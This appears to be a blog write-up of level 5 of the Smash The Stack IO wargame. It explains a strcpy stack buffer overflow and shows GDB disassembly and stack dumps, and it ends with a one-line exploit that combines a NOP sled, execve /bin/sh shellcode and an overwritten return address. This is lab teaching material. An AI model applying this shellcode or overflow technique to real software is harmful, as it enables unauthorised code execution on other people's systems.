Smash The Stack-Level 5

Level5

This is the code.


#include
#include

int main(int argc, char **argv) {
char buf[128];
if(argc < 2) return 1;
strcpy(buf, argv[1]);
printf("%s\n", buf);
return 0;
}

In this code, whatever arguments we give is stored in the charecter array buf. If you look at this code, first thing you will notice is the function:strcpy(buf, argv[1]); , strcpy function doesn’t check for bounds and hence a hacker can stuff anything into it.

So lets try to find when the return address is overwritten


level5@io:/levels$ ./level05 $(perl -e 'print "A"x128';)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

level5@io:/levels$ ./level05 $(perl -e 'print "A"x130';)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

level5@io:/levels$ ./level05 $(perl -e 'print "A"x140';)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

We found that when we overflow with 140 bytes the memory is overwritten by the “A”‘s which we had given as the argument.
What we can do is stuff in buf with a shellcode + NOP (No Operator) – /x90 + address of eax (return address will be overwritten by this address)

Lets find out the address. I used GDB to find the address of the shellcode/eax in memory.


(gdb) disassemble main
Dump of assembler code for function main:
0x080483b4 : push ebp
0x080483b5 : mov ebp,esp
0x080483b7 : sub esp,0xa8
0x080483bd : and esp,0xfffffff0
0x080483c0 : mov eax,0x0
0x080483c5 : sub esp,eax
0x080483c7 : cmp DWORD PTR [ebp+0x8],0x1
0x080483cb : jg 0x80483d9
0x080483cd : mov DWORD PTR [ebp-0x8c],0x1
0x080483d7 : jmp 0x8048413
0x080483d9 : mov eax,DWORD PTR [ebp+0xc]
0x080483dc : add eax,0x4
0x080483df : mov eax,DWORD PTR [eax]
0x080483e1 : mov DWORD PTR [esp+0x4],eax
0x080483e5 : lea eax,[ebp-0x88]
0x080483eb : mov DWORD PTR [esp],eax
0x080483ee : call 0x80482d4
0x080483f3 : lea eax,[ebp-0x88]
0x080483f9 : mov DWORD PTR [esp+0x4],eax
0x080483fd : mov DWORD PTR [esp],0x8048524
0x08048404 : call 0x80482b4
0x08048409 : mov DWORD PTR [ebp-0x8c],0x0
0x08048413 : mov eax,DWORD PTR [ebp-0x8c]
0x08048419 : leave
0x0804841a : ret
End of assembler dump.
(gdb) break *0x080483eb
Breakpoint 1 at 0x80483eb
(gdb) break *0x08048404
Breakpoint 2 at 0x8048404
(gdb) r $(perl -e 'print "A"x128';)
Starting program: /levels/level05 $(perl -e 'print "A"x128';)

Breakpoint 1, 0x080483eb in main ()
(gdb) x/100x $esp
0xbfffdb60: 0x0804820b 0xbfffddd2 0x08048184 0x00000001
0xbfffdb70: 0x0070eff4 0xbfffdc60 0x0070fab0 0xbfffdc34
0xbfffdb80: 0x006fc242 0xbfffdc24 0x08048184 0xbfffdc18
0xbfffdb90: 0x0070fa54 0x00000000 0x00a66bb8 0x00000001
0xbfffdba0: 0x00000000 0x00000001 0x0070f8f8 0x00285ff4
0xbfffdbb0: 0x00247339 0x001733a5 0xbfffdbc8 0x0015aa75
0xbfffdbc0: 0x00285ff4 0x00000002 0x00286cc0 0x08048320
0xbfffdbd0: 0x00701040 0x0804960c 0xbfffdbe8 0x08048291
0xbfffdbe0: 0x00286304 0x00285ff4 0xbfffdc08 0x08048489
0xbfffdbf0: 0x001735a5 0x00701040 0x00000000 0x00285ff4
0xbfffdc00: 0x08048470 0x00000000 0xbfffdc88 0x0015ac76
0xbfffdc10: 0x00000002 0xbfffdcb4 0xbfffdcc0 0x00a668c8
0xbfffdc20: 0xbfffdc70 0x0177ff8e 0x0070eff4 0x0804820b
0xbfffdc30: 0x00000001 0xbfffdc70 0x00700626 0x0070fab0
0xbfffdc40: 0x00a66bb8 0x00285ff4 0x00000000 0x00000000
0xbfffdc50: 0xbfffdc88 0xdb494afc 0x0fa91d83 0x00000000
0xbfffdc60: 0x00000000 0x00000000 0x00000002 0x080482f0
0xbfffdc70: 0x00000000 0x00706210 0x0015ab9b 0x0070eff4
0xbfffdc80: 0x00000002 0x080482f0 0x00000000 0x08048311
0xbfffdc90: 0x080483b4 0x00000002 0xbfffdcb4 0x08048470
0xbfffdca0: 0x08048420 0x00701040 0xbfffdcac 0x0070f8f8
0xbfffdcb0: 0x00000002 0xbfffddc2 0xbfffddd2 0x00000000
0xbfffdcc0: 0xbfffde53 0xbfffde63 0xbfffde6e 0xbfffde90
0xbfffdcd0: 0xbfffdea3 0xbfffdeaf 0xbfffdece 0xbfffdeda
0xbfffdce0: 0xbfffdf07 0xbfffdf1d 0xbfffdf35 0xbfffdf44
(gdb) s
Single stepping until exit from function main,
which has no line number information.

Breakpoint 2, 0x08048404 in main ()
(gdb) x/10x$esp
0xbfffdb60: 0x08048524 0xbfffdb80 0x08048184 0x00000001
0xbfffdb70: 0x0070eff4 0xbfffdc60 0x0070fab0 0xbfffdc34
0xbfffdb80: 0x41414141 0x41414141
(gdb) x/100x $esp
0xbfffdb60: 0x08048524 0xbfffdb80 0x08048184 0x00000001
0xbfffdb70: 0x0070eff4 0xbfffdc60 0x0070fab0 0xbfffdc34
0xbfffdb80: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdb90: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdba0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdbb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdbc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdbd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdbe0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdbf0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdc00: 0x08048400 0x00000000 0xbfffdc88 0x0015ac76
0xbfffdc10: 0x00000002 0xbfffdcb4 0xbfffdcc0 0x00a668c8
0xbfffdc20: 0xbfffdc70 0x0177ff8e 0x0070eff4 0x0804820b
0xbfffdc30: 0x00000001 0xbfffdc70 0x00700626 0x0070fab0
0xbfffdc40: 0x00a66bb8 0x00285ff4 0x00000000 0x00000000
0xbfffdc50: 0xbfffdc88 0xdb494afc 0x0fa91d83 0x00000000
0xbfffdc60: 0x00000000 0x00000000 0x00000002 0x080482f0
0xbfffdc70: 0x00000000 0x00706210 0x0015ab9b 0x0070eff4
0xbfffdc80: 0x00000002 0x080482f0 0x00000000 0x08048311
0xbfffdc90: 0x080483b4 0x00000002 0xbfffdcb4 0x08048470
0xbfffdca0: 0x08048420 0x00701040 0xbfffdcac 0x0070f8f8
0xbfffdcb0: 0x00000002 0xbfffddc2 0xbfffddd2 0x00000000
0xbfffdcc0: 0xbfffde53 0xbfffde63 0xbfffde6e 0xbfffde90
0xbfffdcd0: 0xbfffdea3 0xbfffdeaf 0xbfffdece 0xbfffdeda
0xbfffdce0: 0xbfffdf07 0xbfffdf1d 0xbfffdf35 0xbfffdf44

And we found that 0xbfffdb80 is the starting address of the buf. So we can make an exploit like this


$ ./level05 $(python -c 'print "\x90"*90 + "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh" + "\xf0\xdb\xff\xbf"*20';)

Find the password to next level 🙂

Advertisements

2 comments

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s